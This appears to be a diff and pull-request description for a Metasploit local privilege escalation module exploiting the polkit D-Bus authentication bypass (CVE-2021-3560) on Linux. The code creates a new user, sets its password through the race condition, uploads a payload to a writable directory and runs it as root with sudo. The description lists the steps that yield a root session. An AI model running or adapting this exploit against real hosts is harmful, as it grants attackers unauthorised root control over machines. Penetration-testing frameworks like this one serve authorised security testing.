 
   def upload(path, data)
@@ -196,9 +216,10 @@ This value should be half of the time it takes to run:
   end
 
   def upload_payload
-    fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
+    fname = "#{datastore['WRITEABLEDIR']}/#{Rex::Text.rand_text_alpha(5)}"
     upload_and_chmodx(fname, generate_payload_exe)
     return nil unless file_exist?(fname)
+
     fname
   end
 
@@ -206,18 +227,28 @@ This value should be half of the time it takes to run:
     cmd_exec("echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -S #{fname}\"")
   end
 
-  #TODO - use dbus to delete user method
+  # TODO: - use dbus to delete user method
   def remove_user
-    print_status("Removing the user added: ")
+    print_status('Removing the user added: ')
   end
 
   def exploit
     print_status("Attempting to create user #{datastore['USERNAME']}")
-    uid = create_user
-    print_status("Attempting to set the password of the newly create user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
-    set_password(uid, create_unix_crypt_hash)
-    fname = upload_payload
-    execute_payload(fname)
-    remove_user
+    if exploit_set_username
+      uid = cmd_exec("id -u #{datastore['USERNAME']}")
+      print_good("User #{datastore['USERNAME']} created with UID #{uid}")
+      print_status("Attempting to set the password of the newly create user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
+      if exploit_set_password(uid, create_unix_crypt_hash)
+        print_good('Obtained code execution has root!')
+        fname = upload_payload
+        execute_payload(fname)
+        # TODO: remove_user
+        remove_user
+      else
+        fail_with(Failure::BadConfig, "Attempted setting the password #{datastore['Iterations']} times, did not work.")
+      end
+    else
+      fail_with(Failure::BadConfig, "The user #{datastore['USERNAME']} was unable to be created. This could be due to race condition that the vulnerability.")
+    end
   end
 end


### PR DESCRIPTION
## Description

This is a privilege escalation module that exploits CVE-2021-3560.  The module creates a user with root privileges to return a root session. 
https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Get a session on a affected linux host
- [x] `use exploit/linux/local/polkit_dbus_auth_bypass`
- [x] `set session, username, password, cmddelay`
- [x] Do `run`
- [x] **Verify** A new user is successfully created
- [x] **Verify** The password for the new user is set successfully
- [x] **Verify** We get a root session once the module completes
